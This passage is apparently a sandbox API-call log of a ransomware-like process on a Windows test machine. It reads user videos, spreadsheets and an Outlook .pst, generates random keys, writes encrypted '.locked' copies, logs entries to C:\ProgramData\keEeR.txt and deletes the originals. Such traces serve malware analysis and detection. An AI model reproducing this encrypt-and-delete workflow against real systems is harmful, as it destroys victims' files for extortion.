(hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0318.853] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\O-H60h1HeRHC e51ETm0.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\o-h60h1herhc e51etm0.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0318.894] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0319.602] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1276ee88 | out: lpMode=0x1276ee88) returned 0 [0319.602] WriteFile (in: hFile=0x1b0, lpBuffer=0x16a50000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276ee78, lpOverlapped=0x0 | out: lpBuffer=0x16a50000*, lpNumberOfBytesWritten=0x1276ee78*=0xfa000, lpOverlapped=0x0) returned 1 [0319.627] CloseHandle (hObject=0x1b0) returned 1 [0319.698] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0319.857] SetEvent (hEvent=0x1f0) returned 1 [0319.857] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0319.858] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0319.878] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0320.201] SetEvent (hEvent=0x214) returned 1 [0320.201] SetEvent (hEvent=0x1b8) returned 1 [0320.201] SetEvent (hEvent=0x1d0) returned 1 [0320.201] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x102 [0320.206] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0320.206] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x102 [0320.210] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0320.210] SetEvent (hEvent=0x1d0) returned 1 [0320.210] SetEvent (hEvent=0x1b8) returned 1 [0320.210] SetEvent (hEvent=0x214) returned 1 [0320.210] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0320.212] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x32dafb34, ulCount=0x10, ulNumEntriesRemoved=0x32dafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x32dafb34, ulNumEntriesRemoved=0x32dafb14) returned 0 [0320.212] SetEvent (hEvent=0x214) returned 1 [0320.212] SetEvent (hEvent=0x134) returned 1 [0320.212] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0320.340] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0320.363] SetEvent (hEvent=0x20c) returned 1 [0320.363] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) Thread: id = 448 os_tid = 0x12b0 [0265.640] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3422ff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3422ff58*=0x1d4) returned 1 [0265.640] SetEvent (hEvent=0x1dc) returned 1 [0265.640] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e160*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239fa24, lpReserved=0x0 | out: lpBuffer=0x1263e160*, lpNumberOfCharsWritten=0x1239fa24*=0xb) returned 1 [0265.662] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\SEX0J5RG1Om3TZ.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sex0j5rg1om3tz.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0265.662] GetConsoleMode (in: hConsoleHandle=0x1f8, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0265.662] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\SEX0J5RG1Om3TZ.mp4.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sex0j5rg1om3tz.mp4.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0265.792] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x22c [0265.792] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0269.012] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0269.012] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0269.012] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392020 | out: pbBuffer=0x12392020) returned 1 [0269.012] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0269.012] WriteFile (in: hFile=0x224, lpBuffer=0x12718000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239fd78, lpOverlapped=0x0 | out: lpBuffer=0x12718000*, lpNumberOfBytesWritten=0x1239fd78*=0x80, lpOverlapped=0x0) returned 1 [0269.016] ReadFile (in: hFile=0x1f8, lpBuffer=0x15cde000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x15cde000*, lpNumberOfBytesRead=0x1239fd68*=0xf54c, lpOverlapped=0x0) returned 1 [0269.018] WriteFile (in: hFile=0x224, lpBuffer=0x15cde000*, nNumberOfBytesToWrite=0xf54c, lpNumberOfBytesWritten=0x1239fd74, lpOverlapped=0x0 | out: lpBuffer=0x15cde000*, lpNumberOfBytesWritten=0x1239fd74*=0xf54c, lpOverlapped=0x0) returned 1 [0269.119] ReadFile (in: hFile=0x1f8, lpBuffer=0x15cde000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x15cde000*, lpNumberOfBytesRead=0x1239fd68*=0x0, lpOverlapped=0x0) returned 1 [0269.119] CloseHandle (hObject=0x224) returned 1 [0269.428] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0269.928] CloseHandle (hObject=0x1f8) returned 1 [0269.928] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0269.928] GetConsoleMode (in: hConsoleHandle=0x1f8, lpMode=0x1239fe94 | out: lpMode=0x1239fe94) returned 0 [0269.929] WriteFile (in: hFile=0x1f8, lpBuffer=0x1234a380*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x1239fe64, lpOverlapped=0x0 | out: lpBuffer=0x1234a380*, lpNumberOfBytesWritten=0x1239fe64*=0x36, lpOverlapped=0x0) returned 1 [0269.929] CloseHandle (hObject=0x1f8) returned 1 [0269.930] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\SEX0J5RG1Om3TZ.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sex0j5rg1om3tz.mp4")) returned 1 [0270.224] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x0 [0270.227] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0270.227] SetEvent (hEvent=0x220) returned 1 [0270.227] SetEvent (hEvent=0x1d0) returned 1 [0270.227] SetEvent (hEvent=0x1ac) returned 1 [0270.228] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0270.231] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0270.231] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x0 [0270.233] SetEvent (hEvent=0x214) returned 1 [0270.233] SetEvent (hEvent=0x1ac) returned 1 [0270.233] SetEvent (hEvent=0x1d0) returned 1 [0270.233] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0270.261] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb34, ulCount=0x10, ulNumEntriesRemoved=0x3422fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb34, ulNumEntriesRemoved=0x3422fb14) returned 0 [0270.261] SetEvent (hEvent=0x150) returned 1 [0270.261] SetEvent (hEvent=0x1d0) returned 1 [0270.286] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0270.289] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0270.289] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0270.289] SetEvent (hEvent=0x1d0) returned 1 [0270.311] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0270.316] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0270.316] SetEvent (hEvent=0x20c) returned 1 [0270.316] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0270.433] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0270.506] SetEvent (hEvent=0x12c) returned 1 [0270.506] SetEvent (hEvent=0x1dc) returned 1 [0270.506] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0270.851] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0270.851] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e030 | out: pbBuffer=0x1234e030) returned 1 [0270.851] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0270.851] WriteFile (in: hFile=0x1bc, lpBuffer=0x12701000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12659d78, lpOverlapped=0x0 | out: lpBuffer=0x12701000*, lpNumberOfBytesWritten=0x12659d78*=0x80, lpOverlapped=0x0) returned 1 [0270.855] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0270.855] SetEvent (hEvent=0x214) returned 1 [0270.855] SetEvent (hEvent=0x1d0) returned 1 [0270.855] SetEvent (hEvent=0x104) returned 1 [0270.855] ReadFile (in: hFile=0x180, lpBuffer=0x152e4000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12659d68, lpOverlapped=0x0 | out: lpBuffer=0x152e4000*, lpNumberOfBytesRead=0x12659d68*=0x17c1, lpOverlapped=0x0) returned 1 [0270.858] WriteFile (in: hFile=0x1bc, lpBuffer=0x152e4000*, nNumberOfBytesToWrite=0x17c1, lpNumberOfBytesWritten=0x12659d74, lpOverlapped=0x0 | out: lpBuffer=0x152e4000*, lpNumberOfBytesWritten=0x12659d74*=0x17c1, lpOverlapped=0x0) returned 1 [0270.926] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0273.189] ReadFile (in: hFile=0x180, lpBuffer=0x152e4000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12659d68, lpOverlapped=0x0 | out: lpBuffer=0x152e4000*, lpNumberOfBytesRead=0x12659d68*=0x0, lpOverlapped=0x0) returned 1 [0273.190] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0273.480] CloseHandle (hObject=0x1bc) returned 1 [0273.518] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0273.692] CloseHandle (hObject=0x180) returned 1 [0273.692] SetEvent (hEvent=0x220) returned 1 [0273.692] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0273.696] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0273.714] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0273.728] SetEvent (hEvent=0x190) returned 1 [0273.728] SetEvent (hEvent=0x1ac) returned 1 [0273.728] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0274.147] SetEvent (hEvent=0x220) returned 1 [0274.147] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0274.356] SetEvent (hEvent=0x1d0) returned 1 [0274.356] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0274.356] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1276be94 | out: lpMode=0x1276be94) returned 0 [0274.356] WriteFile (in: hFile=0x200, lpBuffer=0x1234a240*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1276be64, lpOverlapped=0x0 | out: lpBuffer=0x1234a240*, lpNumberOfBytesWritten=0x1276be64*=0x32, lpOverlapped=0x0) returned 1 [0274.356] CloseHandle (hObject=0x200) returned 1 [0274.358] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\gKB9m3gAI3.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\gkb9m3gai3.mp4")) returned 1 [0274.437] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0276.441] SetEvent (hEvent=0x184) returned 1 [0276.441] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0276.445] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0276.625] SetEvent (hEvent=0x12c) returned 1 [0276.625] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0276.851] SetEvent (hEvent=0x1b8) returned 1 [0276.851] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0280.093] SetEvent (hEvent=0x1b8) returned 1 [0280.093] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0280.198] SetEvent (hEvent=0x134) returned 1 [0280.198] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0285.971] SetEvent (hEvent=0x1dc) returned 1 [0285.971] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0285.980] SetEvent (hEvent=0x214) returned 1 [0285.980] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0286.042] SetEvent (hEvent=0x1dc) returned 1 [0286.042] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0286.077] SetEvent (hEvent=0x190) returned 1 [0286.077] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0286.329] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0286.465] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0286.583] SetEvent (hEvent=0x134) returned 1 [0286.583] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc0c0*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1265da24, lpReserved=0x0 | out: lpBuffer=0x125fc0c0*, lpNumberOfCharsWritten=0x1265da24*=0xb) returned 1 [0286.594] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0287.007] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0287.094] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0287.191] SetEvent (hEvent=0x1ac) returned 1 [0287.191] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0287.454] SetEvent (hEvent=0x184) returned 1 [0287.454] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0287.471] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0287.471] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0287.509] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0287.510] SetEvent (hEvent=0x198) returned 1 [0287.510] SetEvent (hEvent=0x12c) returned 1 [0287.510] SetEvent (hEvent=0x1ac) returned 1 [0287.510] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0287.588] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb34, ulCount=0x10, ulNumEntriesRemoved=0x3422fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb34, ulNumEntriesRemoved=0x3422fb14) returned 0 [0287.588] SetEvent (hEvent=0x150) returned 1 [0287.588] SetEvent (hEvent=0x198) returned 1 [0287.588] SetEvent (hEvent=0x12c) returned 1 [0287.588] SetEvent (hEvent=0x1ac) returned 1 [0287.588] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc0c0 | out: pbBuffer=0x125fc0c0) returned 1 [0287.588] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392100 | out: pbBuffer=0x12392100) returned 1 [0287.589] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c281 | out: pbBuffer=0x1237c281) returned 1 [0287.590] WriteFile (in: hFile=0x1a4, lpBuffer=0x124a6000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12623d78, lpOverlapped=0x0 | out: lpBuffer=0x124a6000*, lpNumberOfBytesWritten=0x12623d78*=0x80, lpOverlapped=0x0) returned 1 [0287.600] ReadFile (in: hFile=0x188, lpBuffer=0x1430a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12623d68, lpOverlapped=0x0 | out: lpBuffer=0x1430a000*, lpNumberOfBytesRead=0x12623d68*=0x2282, lpOverlapped=0x0) returned 1 [0287.602] WriteFile (in: hFile=0x1a4, lpBuffer=0x1430a000*, nNumberOfBytesToWrite=0x2282, lpNumberOfBytesWritten=0x12623d74, lpOverlapped=0x0 | out: lpBuffer=0x1430a000*, lpNumberOfBytesWritten=0x12623d74*=0x2282, lpOverlapped=0x0) returned 1 [0287.653] ReadFile (in: hFile=0x188, lpBuffer=0x1430a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12623d68, lpOverlapped=0x0 | out: lpBuffer=0x1430a000*, lpNumberOfBytesRead=0x12623d68*=0x0, lpOverlapped=0x0) returned 1 [0287.655] CloseHandle (hObject=0x1a4) returned 1 [0287.659] CloseHandle (hObject=0x188) returned 1 [0287.659] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0287.660] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x12623e94 | out: lpMode=0x12623e94) returned 0 [0287.660] WriteFile (in: hFile=0x188, lpBuffer=0x12670200*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x12623e64, lpOverlapped=0x0 | out: lpBuffer=0x12670200*, lpNumberOfBytesWritten=0x12623e64*=0x40, lpOverlapped=0x0) returned 1 [0287.660] CloseHandle (hObject=0x188) returned 1 [0287.663] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\YqAV-p.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\yqav-p.bmp")) returned 1 [0287.794] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0287.795] SetEvent (hEvent=0x1ac) returned 1 [0287.795] SetEvent (hEvent=0x12c) returned 1 [0287.801] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0287.831] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0287.831] SetEvent (hEvent=0x1b8) returned 1 [0287.831] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0289.544] SetEvent (hEvent=0x1b8) returned 1 [0289.544] SetEvent (hEvent=0x190) returned 1 [0289.544] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0289.710] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0293.046] SetEvent (hEvent=0x14c) returned 1 [0293.046] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c2c0*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239fa24, lpReserved=0x0 | out: lpBuffer=0x1234c2c0*, lpNumberOfCharsWritten=0x1239fa24*=0xb) returned 1 [0293.063] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0295.126] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0295.269] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0295.269] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Outlook Files\\achoo@gdllo.de.pst.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\outlook files\\achoo@gdllo.de.pst.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0295.460] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0295.720] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0295.720] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0296.325] SetEvent (hEvent=0x190) returned 1 [0296.325] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0296.371] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0296.473] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0296.485] SetEvent (hEvent=0x1dc) returned 1 [0296.485] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0296.587] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0296.587] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0296.648] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0296.648] SetEvent (hEvent=0x20c) returned 1 [0296.648] SetEvent (hEvent=0x14c) returned 1 [0296.648] SetEvent (hEvent=0x1dc) returned 1 [0296.648] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0296.932] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb34, ulCount=0x10, ulNumEntriesRemoved=0x3422fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb34, ulNumEntriesRemoved=0x3422fb14) returned 0 [0296.933] SetEvent (hEvent=0x1dc) returned 1 [0296.933] SetEvent (hEvent=0x14c) returned 1 [0296.933] SetEvent (hEvent=0x12c) returned 1 [0296.933] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0297.696] SetEvent (hEvent=0x134) returned 1 [0297.696] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0297.997] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0298.116] SetEvent (hEvent=0x20c) returned 1 [0298.116] SetEvent (hEvent=0x1b8) returned 1 [0298.116] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0298.123] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12669a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x12669a24*=0xb) returned 1 [0298.158] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\VupTUE7Pb.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\vuptue7pb.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0298.158] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x12669d9c | out: lpMode=0x12669d9c) returned 0 [0298.159] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\VupTUE7Pb.xls.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\vuptue7pb.xls.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0299.671] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x12669d9c | out: lpMode=0x12669d9c) returned 0 [0299.671] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc060 | out: pbBuffer=0x125fc060) returned 1 [0299.671] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e050 | out: pbBuffer=0x1234e050) returned 1 [0299.671] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702401 | out: pbBuffer=0x12702401) returned 1 [0299.672] WriteFile (in: hFile=0x180, lpBuffer=0x1277f000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12669d78, lpOverlapped=0x0 | out: lpBuffer=0x1277f000*, lpNumberOfBytesWritten=0x12669d78*=0x80, lpOverlapped=0x0) returned 1 [0299.716] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x1) returned 0x102 [0299.720] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 [0299.720] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3422fb30, ulCount=0x10, ulNumEntriesRemoved=0x3422fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3422fb30, ulNumEntriesRemoved=0x3422fb10) returned 0 [0299.720] SetEvent (hEvent=0x214) returned 1 [0299.720] SetEvent (hEvent=0x1d0) returned 1 [0299.720] ReadFile (in: hFile=0x1bc, lpBuffer=0x15784000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12669d68, lpOverlapped=0x0 | out: lpBuffer=0x15784000*, lpNumberOfBytesRead=0x12669d68*=0x17ab, lpOverlapped=0x0) returned 1 [0299.722] WriteFile (in: hFile=0x180, lpBuffer=0x15784000*, nNumberOfBytesToWrite=0x17ab, lpNumberOfBytesWritten=0x12669d74, lpOverlapped=0x0 | out: lpBuffer=0x15784000*, lpNumberOfBytesWritten=0x12669d74*=0x17ab, lpOverlapped=0x0) returned 1 [0299.823] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0xffffffff) returned 0x0 